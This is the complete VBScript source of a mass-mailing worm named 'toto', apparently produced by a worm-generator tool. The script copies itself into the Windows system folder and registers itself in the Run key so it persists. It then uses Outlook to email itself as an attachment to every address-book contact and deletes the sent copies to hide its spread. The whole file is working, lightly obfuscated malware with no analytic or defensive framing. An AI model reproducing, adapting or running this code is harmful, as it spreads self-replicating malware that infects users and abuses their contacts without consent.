'Name of the worm : toto
'Author : PetiK
On Error Resume Next

Set qhxvusqx=CreateObject("Scripting.FileSystemObject")
Set xggwnucc=CreateObject("WScript.Shell")
Set cpy=qhxvusqx.GetFile(WScript.ScriptFullName)
cpy.Copy(qhxvusqx.GetSpecialFolder(1)&"\Copy.vbs")
r=("HKLM\Software\Microsoft\Windows\CurrentVersion\Run\")
xggwnucc.RegWrite r,(qhxvusqx.GetSpecialFolder(1)&"\Copy.vbs")

Set ccccccsj=CreateObject("Outlook.Application")
Set jqipgnne=ccccccsj.GetNameSpace("MAPI")
For Each C In jqipgnne.AddressLists
If C.AddressEntries.Count <> 0 Then
For D=1 To C.AddressEntries.Count
Set emdkkbrq=C.AddressEntries(D)
Set qownlsjq=ccccccsj.CreateItem(0)
qownlsjq.To=emdkkbrq.Address
qownlsjq.Subject="Subject of the message"
qownlsjq.Body="The body of the message"
qownlsjq.Attachments.Add(qhxvusqx.GetSpecialFolder(1)&"\Copy.vbs")
qownlsjq.DeleteAfterSubmit=True
If qownlsjq.To <> "" Then
qownlsjq.Send
End If
Next
End If
Next


'This worm was generated by the tool PSWG 1.0